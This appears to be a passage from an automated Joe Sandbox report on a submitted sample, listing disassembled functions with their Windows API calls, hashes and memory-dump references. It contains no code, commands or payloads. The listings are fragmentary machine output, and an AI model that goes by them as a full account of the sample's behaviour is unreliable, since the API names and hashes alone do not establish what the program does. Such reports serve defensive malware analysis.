                                                                                                                            • Opcode ID: ebae0bfa63c553119610ceb78796ff5bbdfb3d766621150be2273124156139f5
                                                                                                                            • Instruction ID: 4f613b0387c9898263baf0d6f4806e51477bcff1edcd8b969983b6bb7d2cb2bf
                                                                                                                            • Opcode Fuzzy Hash: ebae0bfa63c553119610ceb78796ff5bbdfb3d766621150be2273124156139f5
                                                                                                                            • Instruction Fuzzy Hash: C711A33669C707BAFA113624EC0ADA7379CDB15730F200026F910E54E1EEE6E95179A5
                                                                                                                            Function 00F588AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F588D7
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F58904
                                                                                                                            • CoUninitialize.OLE32 ref: 00F5890E
                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00F58A0E
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F58B3B
                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F72C0C), ref: 00F58B6F
                                                                                                                            • CoGetObject.OLE32(?,00000000,00F72C0C,?), ref: 00F58B92
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00F58BA5
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F58C25
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F58C35
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2395222682-0
                                                                                                                            • Opcode ID: 0aa6d10bd1ef9c4e5aea793f9ff6b1cad8a2d9571f524073c0aa4339b402ecf8
                                                                                                                            • Instruction ID: 5e964be6bb27a81c6ceb48bbc96bee2b94d7d73f25e43e46070a48394dfa49d7
                                                                                                                            • Opcode Fuzzy Hash: 0aa6d10bd1ef9c4e5aea793f9ff6b1cad8a2d9571f524073c0aa4339b402ecf8
                                                                                                                            • Instruction Fuzzy Hash: 44C148B1608305AFD700DF24C88492BB7E9FF89399F00495DF989AB251DB71ED0ADB52
                                                                                                                            Function 00F47990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F47A6C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafeVartype
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1725837607-0
                                                                                                                            • Opcode ID: eea8f75a2cb110cdefdeac5e138b46878c8c59d6e3da21ab07e6ca55ca55af64
                                                                                                                            • Instruction ID: 09854dcd80e6cff995df5501bbdc23d4106d01ade59d2664f7f6dda864cd5cee
                                                                                                                            • Opcode Fuzzy Hash: eea8f75a2cb110cdefdeac5e138b46878c8c59d6e3da21ab07e6ca55ca55af64
                                                                                                                            • Instruction Fuzzy Hash: F4B180719083099FDB00EFA4D884BBEBBF5FF49321F144429EA11E7291D774A945EB90
                                                                                                                            Function 00F411CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F411F0
                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F41204
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00F4120B
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F40268,?,00000001), ref: 00F4121A
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4122C
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F40268,?,00000001), ref: 00F41245
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F40268,?,00000001), ref: 00F41257
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F4129C
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F412B1
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F412BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2156557900-0
                                                                                                                            • Opcode ID: a146d227ed1166bd2e692823f124c08bab25e36b0dba74aaf404444a8dabd154
                                                                                                                            • Instruction ID: 06e169e36fa90aa5ce8b86cfd1e7aa21ed014c18e612e13f2933a43d5bacb3ba
                                                                                                                            • Opcode Fuzzy Hash: a146d227ed1166bd2e692823f124c08bab25e36b0dba74aaf404444a8dabd154
                                                                                                                            • Instruction Fuzzy Hash: 0F3191B5A00208BFDB209F54ED48F6A7BA9FB56321F154115FD10CA1A0E7F49E84BB51
                                                                                                                            Function 00F1BDA2 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000008), ref: 00EE2231
                                                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00EE223B
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00EE2250
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00EE2258
                                                                                                                            • GetClientRect.USER32(?), ref: 00F1BDBB
                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F1BDD2
                                                                                                                            • GetWindowDC.USER32(?), ref: 00F1BDDE
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00F1BDED
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F1BDFF
                                                                                                                            • GetSysColor.USER32(00000005), ref: 00F1BE1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3430376129-0
                                                                                                                            • Opcode ID: 8ac799dbf2fb9e412e72cf2b0ac2f0d09ad97382fbba06d716fd934e2e89bb19
                                                                                                                            • Instruction ID: 3acfb3963f43d0e0c2d2f462d32fd6c455203e09f2dd219143a76f12b638d7d5
                                                                                                                            • Opcode Fuzzy Hash: 8ac799dbf2fb9e412e72cf2b0ac2f0d09ad97382fbba06d716fd934e2e89bb19
                                                                                                                            • Instruction Fuzzy Hash: 03216732504249EFDB216FA4EC08BE97BA5EB09332F104265FA26950F1CBB20D95FF11
                                                                                                                            Function 00EEFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EEFAA6
                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00EEFB45
                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00EEFC9C
                                                                                                                            • DestroyWindow.USER32(?), ref: 00F245D6
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00F2463B
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F24668
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                            • String ID: close all
                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                            • Opcode ID: 43cb6c6024f56e114444380ecdf5c3df444ea8f8f3b8e93425afd08aab18eaf5
                                                                                                                            • Instruction ID: 6e55a696bc2839e1a79d0f4536760fc0a8df8c104fce36dd386f06e82c443a89
                                                                                                                            • Opcode Fuzzy Hash: 43cb6c6024f56e114444380ecdf5c3df444ea8f8f3b8e93425afd08aab18eaf5
                                                                                                                            • Instruction Fuzzy Hash: D1A1B13170122ACFCB29EF11D995A69F7A0BF05710F2452ADE80ABB261DB70ED16DF50
                                                                                                                            Function 00F3A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumChildWindows.USER32(?,00F3A439), ref: 00F3A377
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChildEnumWindows
                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                            • API String ID: 3555792229-1603158881
                                                                                                                            • Opcode ID: 56cb669fab766d046a4f4ed0cadd7bc49d6b347abdc9ee813eae7a2f4b3403f5
                                                                                                                            • Instruction ID: c046b317e717a6660c11d54c9b9c1e6b1a7ec324653e3b3ec5765f6b2e55641e
                                                                                                                            • Opcode Fuzzy Hash: 56cb669fab766d046a4f4ed0cadd7bc49d6b347abdc9ee813eae7a2f4b3403f5
                                                                                                                            • Instruction Fuzzy Hash: 45912D31A046069BDF08EFA1C841BEEF7B5FF04320F548119D899A3291DF35A959FB91
                                                                                                                            Function 00EE2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00EE2EAE
                                                                                                                              • Part of subcall function 00EE1DB3: GetClientRect.USER32(?,?), ref: 00EE1DDC
                                                                                                                              • Part of subcall function 00EE1DB3: GetWindowRect.USER32(?,?), ref: 00EE1E1D
                                                                                                                              • Part of subcall function 00EE1DB3: ScreenToClient.USER32(?,?), ref: 00EE1E45
                                                                                                                            • GetDC.USER32 ref: 00F1CD32
                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F1CD45
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F1CD53
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F1CD68
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F1CD70
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F1CDFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                            • Opcode ID: 87985c672c94e3b102f346e97375f0823ff96a63db9a9bee18972b4b7a31d43e
                                                                                                                            • Instruction ID: 5fdd9be877d32b686725464eb98e7c255421652ffd57327fa1ec3f4bc0b64b08
                                                                                                                            • Opcode Fuzzy Hash: 87985c672c94e3b102f346e97375f0823ff96a63db9a9bee18972b4b7a31d43e
                                                                                                                            • Instruction Fuzzy Hash: D571D631900249DFCF258F64DC80AEA7BB5FF49324F14427AED65AA1A6D7318C81EB90
                                                                                                                            Function 00F51A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F51A50
                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F51A7C
                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F51ABE
                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F51AD3
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F51AE0
                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F51B10
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00F51B57
                                                                                                                              • Part of subcall function 00F52483: GetLastError.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F52498
                                                                                                                              • Part of subcall function 00F52483: SetEvent.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F524AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2603140658-3916222277
                                                                                                                            • Opcode ID: 6321cdc944941afca91b50d9f63feda8a2f62bccb92543e9f0d154e6c76cabee
                                                                                                                            • Instruction ID: d8b4d70459edd4795faa3ae4ab5238149a8ac328377071a85d2d3cb3cca34178
                                                                                                                            • Opcode Fuzzy Hash: 6321cdc944941afca91b50d9f63feda8a2f62bccb92543e9f0d154e6c76cabee
                                                                                                                            • Instruction Fuzzy Hash: B54185B1901219BFEB118F50CC85FBB776CFF49355F004126FE159A141E7B4AD48ABA0
                                                                                                                            Function 00F58C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F6F910), ref: 00F58D28
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F6F910), ref: 00F58D5C
                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F58ED6
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00F58F00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560350794-0
                                                                                                                            • Opcode ID: ca05fa739468027ed86fe8e9667dbff41a33cedaf053f2503f50ddb94a5c3857
                                                                                                                            • Instruction ID: fd4c437db0bfb34b140c01570fd6b51a229f09c80b3d4b28b0098866c2d57491
                                                                                                                            • Opcode Fuzzy Hash: ca05fa739468027ed86fe8e9667dbff41a33cedaf053f2503f50ddb94a5c3857
                                                                                                                            • Instruction Fuzzy Hash: 2AF15C71A00109EFCF04DFA4C884EAEB7B9FF49355F108458FA15AB251DB71AE4ADB50
                                                                                                                            Function 00F5F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F5F6B5
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F848
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F86C
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F8AC
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F8CE
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F5FA4A
                                                                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F5FA7C
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F5FAAB
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F5FB22
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4090791747-0
                                                                                                                            • Opcode ID: 3cad84fa570052c4f84bc08c2d74c0a2cb602a8c4bf1a2f110eea6521cc14b94
                                                                                                                            • Instruction ID: 24905ea4d924afce9bd7a9188164312674380e76c13879ec0ced4997a43a2655
                                                                                                                            • Opcode Fuzzy Hash: 3cad84fa570052c4f84bc08c2d74c0a2cb602a8c4bf1a2f110eea6521cc14b94
                                                                                                                            • Instruction Fuzzy Hash: C7E1E3316043459FC714EF24D881B6ABBE1EF85320F1484ADFD999B2A2CB34DC49EB52
                                                                                                                            Function 00F44CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F43697,?), ref: 00F4468B
                                                                                                                              • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F43697,?), ref: 00F446A4
                                                                                                                              • Part of subcall function 00F44A31: GetFileAttributesW.KERNEL32(?,00F4370B), ref: 00F44A32
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F44D40
                                                                                                                            • _wcscmp.LIBCMT ref: 00F44D5A
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F44D75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 793581249-0
                                                                                                                            • Opcode ID: fa84ac71ee2176de0c23ad6f1b00c5686cdfc95d93c9d5948a1b93c8425a062c
                                                                                                                            • Instruction ID: 8f9eb4b9b2a9e3e5b6a00664941fa5a4400b4875f92ba50fc9329bbe419e730c
                                                                                                                            • Opcode Fuzzy Hash: fa84ac71ee2176de0c23ad6f1b00c5686cdfc95d93c9d5948a1b93c8425a062c
                                                                                                                            • Instruction Fuzzy Hash: 835153B24083859BC764DB90DC81ADFB7ECAF85350F00092EB685D3191EF35B588D766
                                                                                                                            Function 00F68645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F686FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634782764-0
                                                                                                                            • Opcode ID: c08c2de13c3e519c5f68f0f0b13b09cb5f06b1a1471033c0259e28b3777c2051
                                                                                                                            • Instruction ID: 128bbbd12c3731078e56e9414d29a4805132b2e5e79b8df0d79e44a46eb21465
                                                                                                                            • Opcode Fuzzy Hash: c08c2de13c3e519c5f68f0f0b13b09cb5f06b1a1471033c0259e28b3777c2051
                                                                                                                            • Instruction Fuzzy Hash: 3F519331900248BFDB209F24DC85F9D7BA4AB057A0F604319FA51E71A1CFB6AD81FB51
                                                                                                                            Function 00EE2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F1C2F7
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F1C319
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F1C331
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F1C34F
